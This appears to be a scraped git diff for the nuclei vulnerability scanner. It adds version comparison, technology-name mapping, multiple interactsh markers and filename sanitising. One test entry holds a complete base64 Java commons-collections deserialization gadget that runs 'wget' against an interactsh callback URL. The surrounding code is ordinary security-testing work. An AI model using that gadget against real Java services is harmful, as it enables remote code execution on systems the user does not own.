|
||||
var noTemplatesFound bool
|
||||
if !fileutil.FileExists(r.templatesConfig.TemplatesDirectory) {
|
||||
if !fileutil.FolderExists(r.templatesConfig.TemplatesDirectory) {
|
||||
noTemplatesFound = true
|
||||
}
|
||||
|
||||
|
|
|
@ -27,7 +27,7 @@ type Config struct {
|
|||
const nucleiConfigFilename = ".templates-config.json"
|
||||
|
||||
// Version is the current version of nuclei
|
||||
const Version = `2.6.5`
|
||||
const Version = `2.6.6`
|
||||
|
||||
func getConfigDetails() (string, error) {
|
||||
configDir, err := GetConfigDir()
|
||||
|
|
|
@ -25,6 +25,7 @@ import (
|
|||
|
||||
"github.com/Knetic/govaluate"
|
||||
"github.com/asaskevich/govalidator"
|
||||
"github.com/hashicorp/go-version"
|
||||
"github.com/logrusorgru/aurora"
|
||||
"github.com/spaolacci/murmur3"
|
||||
|
||||
|
@ -447,6 +448,30 @@ func init() {
|
|||
return true, nil
|
||||
},
|
||||
),
|
||||
"compare_versions": makeDslWithOptionalArgsFunction(
|
||||
"(firstVersion, constraints ...string) bool",
|
||||
func(args ...interface{}) (interface{}, error) {
|
||||
if len(args) < 2 {
|
||||
return nil, invalidDslFunctionError
|
||||
}
|
||||
|
||||
firstParsed, parseErr := version.NewVersion(types.ToString(args[0]))
|
||||
if parseErr != nil {
|
||||
return nil, parseErr
|
||||
}
|
||||
|
||||
var versionConstraints []string
|
||||
for _, constraint := range args[1:] {
|
||||
versionConstraints = append(versionConstraints, types.ToString(constraint))
|
||||
}
|
||||
constraint, constraintErr := version.NewConstraint(strings.Join(versionConstraints, ","))
|
||||
if constraintErr != nil {
|
||||
return nil, constraintErr
|
||||
}
|
||||
result := constraint.Check(firstParsed)
|
||||
return result, nil
|
||||
},
|
||||
),
|
||||
"print_debug": makeDslWithOptionalArgsFunction(
|
||||
"(args ...interface{})",
|
||||
func(args ...interface{}) (interface{}, error) {
|
||||
|
|
|
@ -108,6 +108,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
|
|||
expected := ` [93mbase64[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mbase64_decode[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mbase64_py[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mcompare_versions[0m(firstVersion, constraints [38;5;208m...string[0m)[38;5;208m bool[0m
|
||||
[93mconcat[0m(args [38;5;208m...interface{}[0m)[38;5;208m string[0m
|
||||
[93mcontains[0m(arg1, arg2 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mdate[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
|
@ -209,16 +210,20 @@ func TestDslExpressions(t *testing.T) {
|
|||
`zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))`: "Hello",
|
||||
`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`: "Hello",
|
||||
`generate_java_gadget("commons-collections3.1", "wget https://{{interactsh-url}}", "base64")`: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAH3dnZXQgaHR0cHM6Ly97e2ludGVyYWN0c2gtdXJsfX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==",
|
||||
`base64_decode("SGVsbG8=")`: "Hello",
|
||||
`hex_decode("6161")`: "aa",
|
||||
`len("Hello")`: float64(5),
|
||||
`len(1234)`: float64(4),
|
||||
`contains("Hello", "lo")`: true,
|
||||
`regex("H([a-z]+)o", "Hello")`: true,
|
||||
`wait_for(1)`: nil,
|
||||
`print_debug(1+2, "Hello")`: nil,
|
||||
`to_number('4')`: float64(4),
|
||||
`to_string(4)`: "4",
|
||||
`base64_decode("SGVsbG8=")`: "Hello",
|
||||
`hex_decode("6161")`: "aa",
|
||||
`len("Hello")`: float64(5),
|
||||
`len(1234)`: float64(4),
|
||||
`contains("Hello", "lo")`: true,
|
||||
`regex("H([a-z]+)o", "Hello")`: true,
|
||||
`wait_for(1)`: nil,
|
||||
`print_debug(1+2, "Hello")`: nil,
|
||||
`to_number('4')`: float64(4),
|
||||
`to_string(4)`: "4",
|
||||
`compare_versions('v1.0.0', '<1.1.1')`: true,
|
||||
`compare_versions('v1.1.1', '>v1.1.0')`: true,
|
||||
`compare_versions('v1.0.0', '>v0.0.1,<v1.0.1')`: true,
|
||||
`compare_versions('v1.0.0', '>v0.0.1', '<v1.0.1')`: true,
|
||||
}
|
||||
|
||||
for dslExpression, expectedResult := range dslExpressions {
|
||||
|
|
|
@ -4,11 +4,14 @@ import (
|
|||
"io"
|
||||
"io/ioutil"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"github.com/corpix/uarand"
|
||||
"github.com/pkg/errors"
|
||||
"github.com/projectdiscovery/gologger"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/catalog/config"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/core"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/protocols"
|
||||
|
@ -17,6 +20,7 @@ import (
|
|||
"github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
|
||||
"github.com/projectdiscovery/retryablehttp-go"
|
||||
wappalyzer "github.com/projectdiscovery/wappalyzergo"
|
||||
"gopkg.in/yaml.v2"
|
||||
)
|
||||
|
||||
// Service is a service for automatic automatic scan execution
|
||||
|
@ -29,8 +33,9 @@ type Service struct {
|
|||
childExecuter *core.ChildExecuter
|
||||
httpclient *retryablehttp.Client
|
||||
|
||||
results bool
|
||||
allTemplates []string
|
||||
results bool
|
||||
allTemplates []string
|
||||
technologyMappings map[string]string
|
||||
}
|
||||
|
||||
// Options contains configuration options for automatic scan service
|
||||
|
@ -41,6 +46,8 @@ type Options struct {
|
|||
Target core.InputProvider
|
||||
}
|
||||
|
||||
const mappingFilename = "wappalyzer-mapping.yml"
|
||||
|
||||
// New takes options and returns a new smart workflow service
|
||||
func New(opts Options) (*Service, error) {
|
||||
wappalyzer, err := wappalyzer.New()
|
||||
|
@ -48,6 +55,19 @@ func New(opts Options) (*Service, error) {
|
|||
return nil, err
|
||||
}
|
||||
|
||||
var mappingData map[string]string
|
||||
config, err := config.ReadConfiguration()
|
||||
if err == nil {
|
||||
mappingFile := filepath.Join(config.TemplatesDirectory, mappingFilename)
|
||||
if file, err := os.Open(mappingFile); err == nil {
|
||||
_ = yaml.NewDecoder(file).Decode(&mappingData)
|
||||
file.Close()
|
||||
}
|
||||
}
|
||||
if opts.ExecuterOpts.Options.Verbose {
|
||||
gologger.Verbose().Msgf("Normalized mapping (%d): %v\n", len(mappingData), mappingData)
|
||||
}
|
||||
|
||||
// Collect path for default directories we want to look for templates in
|
||||
var allTemplates []string
|
||||
for _, directory := range defaultTemplatesDirectories {
|
||||
|
@ -67,14 +87,15 @@ func New(opts Options) (*Service, error) {
|
|||
}
|
||||
|
||||
return &Service{
|
||||
opts: opts.ExecuterOpts,
|
||||
store: opts.Store,
|
||||
engine: opts.Engine,
|
||||
target: opts.Target,
|
||||
wappalyzer: wappalyzer,
|
||||
allTemplates: allTemplates,
|
||||
childExecuter: childExecuter,
|
||||
httpclient: httpclient,
|
||||
opts: opts.ExecuterOpts,
|
||||
store: opts.Store,
|
||||
engine: opts.Engine,
|
||||
target: opts.Target,
|
||||
wappalyzer: wappalyzer,
|
||||
allTemplates: allTemplates,
|
||||
childExecuter: childExecuter,
|
||||
httpclient: httpclient,
|
||||
technologyMappings: mappingData,
|
||||
}, nil
|
||||
}
|
||||
|
||||
|
@ -145,8 +166,25 @@ func (s *Service) processWappalyzerInputPair(input string) {
|
|||
resp.Body.Close()
|
||||
|
||||
fingerprints := s.wappalyzer.Fingerprint(resp.Header, data)
|
||||
items := make([]string, 0, len(fingerprints))
|
||||
normalized := make(map[string]struct{})
|
||||
for k := range fingerprints {
|
||||
normalized[strings.ToLower(k)] = struct{}{}
|
||||
}
|
||||
|
||||
if s.opts.Options.Verbose {
|
||||
gologger.Verbose().Msgf("Wappalyzer fingerprints %v for %s\n", normalized, input)
|
||||
}
|
||||
|
||||
for k := range normalized {
|
||||
// Replace values with mapping data
|
||||
if value, ok := s.technologyMappings[k]; ok {
|
||||
delete(normalized, k)
|
||||
normalized[value] = struct{}{}
|
||||
}
|
||||
}
|
||||
|
||||
items := make([]string, 0, len(normalized))
|
||||
for k := range normalized {
|
||||
if strings.Contains(k, " ") {
|
||||
parts := strings.Split(strings.ToLower(k), " ")
|
||||
items = append(items, parts...)
|
|
@ -6,6 +6,7 @@ import (
|
|||
"encoding/hex"
|
||||
"fmt"
|
||||
"os"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
|
@ -36,6 +37,8 @@ type Client struct {
|
|||
interactions *ccache.Cache
|
||||
// matchedTemplates is a stored cache to track matched templates
|
||||
matchedTemplates *ccache.Cache
|
||||
// interactshURLs is a stored cache to track track multiple interactsh markers
|
||||
interactshURLs *ccache.Cache
|
||||
|
||||
options *Options
|
||||
eviction time.Duration
|
||||
|
@ -50,7 +53,7 @@ type Client struct {
|
|||
|
||||
var (
|
||||
defaultInteractionDuration = 60 * time.Second
|
||||
interactshURLMarker = "{{interactsh-url}}"
|
||||
interactshURLMarkerRegex = regexp.MustCompile(`{{interactsh-url(?:_[0-9]+){0,3}}}`)
|
||||
)
|
||||
|
||||
// Options contains configuration options for interactsh nuclei integration.
|
||||
|
@ -104,11 +107,13 @@ func New(options *Options) (*Client, error) {
|
|||
interactionsCache := ccache.New(interactionsCfg)
|
||||
|
||||
matchedTemplateCache := ccache.New(ccache.Configure().MaxSize(defaultMaxInteractionsCount))
|
||||
interactshURLCache := ccache.New(ccache.Configure().MaxSize(defaultMaxInteractionsCount))
|
||||
|
||||
interactClient := &Client{
|
||||
eviction: options.Eviction,
|
||||
interactions: interactionsCache,
|
||||
matchedTemplates: matchedTemplateCache,
|
||||
interactshURLs: interactshURLCache,
|
||||
options: options,
|
||||
requests: cache,
|
||||
pollDuration: options.PollDuration,
|
||||
|
@ -254,10 +259,18 @@ func (c *Client) Close() bool {
|
|||
// It accepts data to replace as well as the URL to replace placeholders
|
||||
// with generated uniquely for each request.
|
||||
func (c *Client) ReplaceMarkers(data string, interactshURLs []string) (string, []string) {
|
||||
for strings.Contains(data, interactshURLMarker) {
|
||||
for interactshURLMarkerRegex.Match([]byte(data)) {
|
||||
url := c.URL()
|
||||
interactshURLs = append(interactshURLs, url)
|
||||
data = strings.Replace(data, interactshURLMarker, url, 1)
|
||||
interactshURLMarker := interactshURLMarkerRegex.FindString(data)
|
||||
if interactshURLMarker != "" {
|
||||
data = strings.Replace(data, interactshURLMarker, url, 1)
|
||||
urlIndex := strings.Index(url, ".")
|
||||
if urlIndex == -1 {
|
||||
continue
|
||||
}
|
||||
c.interactshURLs.Set(url, interactshURLMarker, defaultInteractionDuration)
|
||||
}
|
||||
}
|
||||
return data, interactshURLs
|
||||
}
|
||||
|
@ -265,14 +278,21 @@ func (c *Client) ReplaceMarkers(data string, interactshURLs []string) (string, [
|
|||
// MakePlaceholders does placeholders for interact URLs and other data to a map
|
||||
func (c *Client) MakePlaceholders(urls []string, data map[string]interface{}) {
|
||||
data["interactsh-server"] = c.hostname
|
||||
for _, url := range urls {
|
||||
if interactshURLMarker := c.interactshURLs.Get(url); interactshURLMarker != nil {
|
||||
if interactshURLMarker, ok := interactshURLMarker.Value().(string); ok {
|
||||
interactshMarker := strings.TrimSuffix(strings.TrimPrefix(interactshURLMarker, "{{"), "}}")
|
||||
|
||||
if len(urls) == 1 {
|
||||
urlIndex := strings.Index(urls[0], ".")
|
||||
if urlIndex == -1 {
|
||||
return
|
||||
c.interactshURLs.Delete(url)
|
||||
|
||||
data[interactshMarker] = url
|
||||
urlIndex := strings.Index(url, ".")
|
||||
if urlIndex == -1 {
|
||||
continue
|
||||
}
|
||||
data[strings.Replace(interactshMarker, "url", "id", 1)] = url[:urlIndex]
|
||||
}
|
||||
}
|
||||
data["interactsh-url"] = urls[0]
|
||||
data["interactsh-id"] = urls[0][:urlIndex]
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -355,7 +375,7 @@ func HasMatchers(op *operators.Operators) bool {
|
|||
|
||||
// HasMarkers checks if the text contains interactsh markers
|
||||
func HasMarkers(data string) bool {
|
||||
return strings.Contains(data, interactshURLMarker)
|
||||
return interactshURLMarkerRegex.Match([]byte(data))
|
||||
}
|
||||
|
||||
func (c *Client) debugPrintInteraction(interaction *server.Interaction, event *operators.Result) {
|
||||
|
|
|
@ -9,6 +9,7 @@ import (
|
|||
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/output"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/reporting/format"
|
||||
"github.com/projectdiscovery/stringsutil"
|
||||
)
|
||||
|
||||
type Exporter struct {
|
||||
|
@ -78,5 +79,5 @@ func sanitizeFilename(filename string) string {
|
|||
if len(filename) > 256 {
|
||||
filename = filename[0:255]
|
||||
}
|
||||
return filename
|
||||
return stringsutil.ReplaceAny(filename, "_", "?", "/", ">", "|", ":", ";", "*", "<", "\"", "'", " ")
|
||||
}
|
||||
|
|
|
@ -93,6 +93,21 @@ func RunNucleiBinaryAndGetLoadedTemplates(nucleiBinary string, debug bool, args
|
|||
}
|
||||
return matches[0][1], nil
|
||||
}
|
||||
func RunNucleiBinaryAndGetCombinedOutput(debug bool, args []string) (string, error) {
|
||||
cmd := exec.Command("./nuclei", args...)
|
||||
if debug {
|
||||
cmd.Args = append(cmd.Args, "-debug")
|
||||
fmt.Println(cmd.String())
|
||||
}
|
||||
data, err := cmd.CombinedOutput()
|
||||
if debug {
|
||||
fmt.Println(string(data))
|
||||
}
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return string(data), nil
|
||||
}
|
||||
|
||||
// TestCase is a single integration test case
|
||||
type TestCase interface {
|
||||
|
|
Loading…
Reference in New Issue